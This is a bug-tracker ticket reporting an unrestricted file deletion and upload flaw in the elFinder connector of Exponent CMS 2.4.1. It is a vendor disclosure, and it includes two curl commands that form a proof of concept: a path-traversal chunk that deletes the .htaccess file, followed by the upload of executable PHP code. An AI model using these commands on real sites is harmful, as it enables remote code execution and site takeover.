#1404 Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder - Exponent CMS

Type	To find
responsible:me	tickets assigned to you
tagged:"@high"	tickets tagged @high
milestone:next	tickets in the upcoming milestone
state:invalid	tickets with the state invalid
created:"last week"	tickets created last week
sort:number, importance, updated	tickets sorted by #, importance or updated
Combine keywords for powerful searching.
Use advanced searching »

#1404 new

Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder

Reported by mm | January 10th, 2017 @ 04:52 PM

Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php

Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"

curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.